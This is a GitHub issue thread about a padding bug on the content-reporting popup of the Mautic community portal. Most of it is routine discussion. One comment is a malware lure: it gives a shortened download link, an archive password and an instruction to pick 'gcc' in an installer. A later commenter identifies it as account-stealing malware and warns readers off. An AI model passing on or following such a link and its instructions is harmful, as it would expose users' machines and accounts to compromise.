### ISSUE TITLE
Styling issue on popups for reporting content

### ISSUE THREAD

**Issue by RCheesley** [mautic/Community-Portal#87]
I noticed this issue with a lack of padding when you click to report a comment on an entity in the portal (e.g. on this link I was trying to report a duplicate comment: https://community.mautic.org/assemblies/elts/f/92/debates/8)

![screenshot-community mautic org-2024 08 27-17_24_29](https://github.com/user-attachments/assets/7c8baf69-1417-430a-81cd-49ab44803514)

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by froger** [comment]
Hi, for styling issues you can refer to my comment: https://github.com/mautic/Community-Portal/issues/86#issuecomment-2328466234

**Comment by Jaishree2310** [comment]
@RCheesley  Can i take this issue?

**Comment by RCheesley** [comment]
I'm just waiting to find out if it's been resolved already but not deployed yet - please bear with me. I'd suggest checking all our other Hacktoberfest tasks if you're looking for something to tackle - sorry about this one, it was created a while back and just last week I think it was resolved.
